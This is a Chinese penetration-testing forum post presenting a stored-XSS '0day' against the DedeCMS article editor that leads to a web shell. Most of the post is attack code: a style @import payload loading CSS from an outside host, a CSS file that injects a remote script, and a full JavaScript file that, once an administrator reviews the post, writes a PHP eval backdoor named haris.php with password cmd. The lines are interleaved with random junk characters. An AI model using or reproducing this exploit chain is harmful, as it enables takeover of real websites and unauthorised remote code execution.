找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1638|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell9 f% L$ ~# Q8 V! g) x
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
1 u4 K: W! m3 U; j6 D目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。# s7 A6 }: u; |4 _3 N
下面说说利用方法。
3 ~0 h$ ?- j/ g, Q' o. N9 y+ y条件有2个:
6 ?) m1 S/ e, r5 J* N1.开启注册' V, r: T+ ?& b) c2 t
2.开启投稿" r# `3 W# |5 @- P3 i) i. l
注册会员----发表文章
8 ^0 P& r5 @% e内容填写:
8 }4 R9 R& W- E+ x% r; @3 }复制代码
, M' \; h9 Q8 |7 h" R3 B<style>@im\port'\http://xxx.com/xss.css';</style>( S$ N' D/ h8 d* n
新建XSS.Css' t0 V' e' L+ O* `: {0 h
复制代码. R9 ]! u) Y/ o& I' \
.body{
5 [! `5 y; K6 p% L, G. ]background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
! g8 @4 }7 i  [2 ^4 F新建xss.js 内容为
: A9 a2 S4 c% _8 z复制代码* v1 o$ j0 Y$ I' C9 x: U  F
1.var request = false;
2 I' G) ^5 d" \0 Q2.if(window.XMLHttpRequest) {
1 f- q( u+ x4 a" d0 Y& t; @3.request = new XMLHttpRequest();
, t( p5 J. z  }- g5 X4.if(request.overrideMimeType) {* Q6 h9 p% c$ c
5.request.overrideMimeType('text/xml');+ Z- n' B5 s; n! m
6.}2 ~# O/ c4 C: J- f/ U9 h
7.} else if(window.ActiveXObject) {
7 t/ p1 P" h* I8 l0 B& [3 S7 r8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
. f% o% m3 f# y) T+ @/ L1 B9.for(var i=0; i<versions.length; i++) {
4 n4 u! j+ P7 g' k  {10.try {8 i7 g) i' f  e( c% g- i
11.request = new ActiveXObject(versions);
  Z: M( i! Y  E12.} catch(e) {}
5 c0 i% F5 x% F13.}
9 x8 U1 O# p+ h! E+ p- \, ?, r# f14.}) L$ Q2 L. w5 T) B0 D/ N1 P
15.xmlhttp=request;
7 x5 S( w2 `0 X. n- [) T16.function getFolder( url ){
& C" Z) D# V9 v: s3 Y5 ]17. obj = url.split('/')$ \3 s0 N% ~6 ^" c- e
18. return obj[obj.length-2]
3 I( m0 E7 q5 V+ T0 H8 L6 ^19.}
8 L) G- n7 @0 g4 i: w: ^$ S  K: D" C* G20.oUrl = top.location.href;3 g, g% t) M1 O" b3 E( U' z9 K
21.u = getFolder(oUrl);. r" ~8 v% E/ Z. Q+ g
22.add_admin();) A1 M! H. J  ?8 A3 `- y
23.function add_admin(){
7 C; {. c3 R/ v$ d# ^$ e, }24.var url= "/"+u+"/sys_sql_query.php";
' `3 S0 H- ~) o; A1 r, ~+ ]6 v25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";) y7 U- i9 x* _1 X
26.xmlhttp.open("POST", url, true);4 s3 |' ^! u8 }" t2 a$ Z6 m8 q
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
& {# `" y- @, v: o- a) z+ E9 B28.xmlhttp.setRequestHeader("Content-length", params.length);) f2 |' T  Z6 x% n) I
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");+ A9 u* \! T3 W
30.xmlhttp.send(params);8 }; l" u' J, q/ T
31.}! W9 g4 w2 s$ ~& G6 Y' h" Y
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表